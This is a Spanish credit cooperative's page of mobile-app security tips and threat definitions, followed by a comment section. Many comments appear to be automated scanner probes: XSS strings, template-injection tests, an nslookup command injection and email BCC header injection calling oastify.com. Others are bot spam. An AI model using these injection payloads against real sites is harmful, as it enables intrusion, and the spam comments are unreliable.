¡Hola soy Luisa,
escríbeme!

Seguridad

Seguridad en Aplicaciones Móviles

  • Seguridad en Aplicaciones Móviles 
  1. Descargue la APP únicamente a través de Google Play o APP Store, en donde la encontraras como: LC virtual
  2. Para acceder a la APP Móvil se le solicitará la clave y usuario de acceso de la cooperativa Virtual (la que
    utiliza a través de la página web).
  3. Al efectuar transacciones se le enviará un código de seguridad (OTP) a su número celular y correo electrónico registrado en la Cooperativa.
  4. Es responsabilidad del socio/usuario que tenga su información actualizada en la Cooperativa, con el fin de que toda notificación de transacción realizada a través de canales electrónicos pueda ser conocida de inmediato a través de mensajes de texto a su número celular y correo electrónico.
  5. Recuerde que la cooperativa no solicita contraseñas de correo electrónico, dispositivos móviles o medio de uso personal por ningún medio.
  6. Si se registra 3 intentos de ingreso fallidos a su cuenta con claves incorrectas, el sistema procede a bloquear el acceso. Para desbloquear el dispositivo deberá ingresar en el botón «Cuenta bloqueada» y seguir los pasos indicados.
  7. Le recordamos que su clave de acceso y el celular son parte de tus bienes personales por tanto su prolijo cuidado y uso es su responsabilidad.
  8. Al terminar el uso de nuestro sistema Virtual y APP Móvil es necesario que cierre la sesión, para evitar inconvenientes.
  9. Cooperativa de ahorro y crédito se reserva el derecho de modificar, suspender o interrumpir el
    servicio del aplicativo móvil o parte de este, no obstante, informará a los socios a través de redes
    sociales o página web de dicha decisión
 

 CONSEJOS DE PREVENCIÓN

Le brindamos una lista de las amenazas más frecuentes:

 • Phishing. – Zonas que falsifican sitios corporativos legítimos con el objetivo de obtener información confidencial financiera, u otro tipo de información de los usuarios. 

• Bot. – Aplicaciones relacionadas, que se han infiltrado en las computadoras de los usuarios con fines maliciosos, por ejemplo, acceso remoto o robo de información. 

• Keylogger. – Programas que se ejecutan de fondo y registran todos los movimientos del teclado, y que pueden enviar dicha información posiblemente contraseñas o información confidencial a un tercero externo. 

• Software Malicioso. – Diseñado por una persona externa para atacar o manipular la máquina o la red, ya sea para causar daño, utilizar información y recursos en forma no autorizada. 

• Spyware. – Software utilizado para registrar e informar sobre la actividad de una computadora de escritorio sin el conocimiento del usuario, excluye hardware y cookies. 

• Pharming. – Es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o en el de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) a otra máquina distinta. De esta forma un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombre de dominio. 

• Troyanos. – Los troyanos son programas maliciosos que están disfrazados como algo atractivo que invitan al usuario a ejecutarlo ocultando un software malicioso. Este software puede tener un efecto inmediato y consecuencias indeseables, por ejemplo, borrar los archivos del usuario, instalar programas indeseables o maliciosos.

 

72 Replies to “Seguridad en Aplicaciones Móviles”

  1. karla dice:

    prueba

  2. rmtqhccxsl dice:

    Muchas gracias. ?Como puedo iniciar sesion?

  3. Anónimo dice:

    Comentario *

  4. Anónimo dice:

    Comentario *’

  5. Anónimo dice:

    Comentario *”

  6. Anónimo dice:

    l499j05s0v

  7. Anónimo dice:

    Comentario *4l1z0a7319

  8. Anónimo dice:

    Comentario *alert(1)

  9. Anónimo dice:

    Comentario *crig66yppf><

  10. Anónimo dice:

    Comentario *crig66yppf%3e%3c

  11. Anónimo dice:

    alert(1)

  12. Anónimo dice:

    wbc3nrciie><

  13. Anónimo dice:

    wbc3nrciie%3e%3c

  14. Anónimo dice:

    mysd5#{518*609}v38dh

  15. Anónimo dice:

    kaov0[[124*829]]eb730

  16. Anónimo dice:

    ufz7r%{777*588}v9ebe

  17. Anónimo dice:

    vsnst5e5u5p0a092g5ft

  18. Anónimo dice:

    o0ppijsgc4%4185bphed0ij

  19. Anónimo dice:

    3jdtpqlten\\l9n83xna8o

  20. Anónimo dice:

    pys8y8p9yaApm2hnhpr60

  21. Anónimo dice:

    Comentario *c09jv3fs3w9f92py4igd

  22. Anónimo dice:

    Comentario *f4rn2c22s6%418myiy9jkb9

  23. Anónimo dice:

    Comentario *28f9zh0dg8\\lsp4y5o44x

  24. Anónimo dice:

    Comentario *fpcfxou4jgAqtpcy41394

  25. Anónimo dice:

    tnkdxe7i2yj0eqdfmx71ygospjvcjcf07ozbpze.oastify.com

  26. Anónimo dice:

    nslookup -q=cname ykmiuj4nz3g5bvakj246vllxmoshghc558t0gq4f.oastify.com.&

  27. Anónimo dice:

    Comentario *
    BCC:tspd2eci7yo0jqifrxc13gtsuj0cock0ct0lnbb0@oastify.com
    emg: l

  28. Anónimo dice:

    Comentario *>
    BCC:sd9cndxhsx9z4p3ecwx0oferfilb9b5zxtll8bw0@oastify.com
    dci: c

  29. Anónimo dice:

    %{3284*8041}

  30. Anónimo dice:

    3762*331

  31. Anónimo dice:

    730m”vasv

  32. Anónimo dice:

    @(9112*6642)

  33. Anónimo dice:

    xz340fkvu57yyb9q74wrtqv

  34. Anónimo dice:

    hhx16wlxf3`z’z”${{%{{\

  35. Anónimo dice:

    z6fer0pj15\z`z’z”${{%{{\

  36. Anónimo dice:

    hb9ylzit6

  37. vomtrtscr1 dice:

    Comentario *

  38. alert(1) dice:

    Comentario *

  39. g52urr1li5> dice:

    Comentario *

  40. g52urr1li5 dice:

    Comentario *

  41. eyjui#{901*126}thlc8 dice:

    Comentario *

  42. k0k3g[[504*612]]he4y9 dice:

    Comentario *

  43. ib6ar%{198*820}rje31 dice:

    Comentario *

  44. }}k5fbu'/" dice:

    Comentario *

  45. %}tuglk'/" dice:

    Comentario *

  46. Your article helped me a lot, is there any more related content? Thanks!

  47. Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  48. Your point of view caught my eye and was very interesting. Thanks. I have a question for you.

  49. binance dice:

    Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  50. Your point of view caught my eye and was very interesting. Thanks. I have a question for you.

  51. Your point of view caught my eye and was very interesting. Thanks. I have a question for you.

  52. Your article helped me a lot, is there any more related content? Thanks!

  53. Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  54. Sign Up dice:

    Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  55. eco bij dice:

    Hi! Do you know if they make any plugins to assist with Search Engine Optimization? I’m
    trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Thank you! I saw similar art here: Bij nl

  56. I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.

  57. binance dice:

    Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  58. Anónimo dice:

    Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.

  59. Anónimo dice:

    Your article helped me a lot, is there any more related content? Thanks!

  60. Plolflype dice:

    [url=https://fastpriligy.top/]what is priligy dapoxetine[/url] EBV has previously been shown to increase the expression of several pol III targets 29, 36, 37

  61. Your point of view caught my eye and was very interesting. Thanks. I have a question for you.

  62. binance dice:

    Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  63. binance dice:

    Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  64. Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  65. Your point of view caught my eye and was very interesting. Thanks. I have a question for you.

  66. I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.

  67. I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article.

  68. Thanks for sharing. I read many of your blog posts, cool, your blog is very good.

  69. Your article helped me a lot, is there any more related content? Thanks!

  70. Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?

  71. Your article helped me a lot, is there any more related content? Thanks!

  72. Your article helped me a lot, is there any more related content? Thanks!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Close Search Window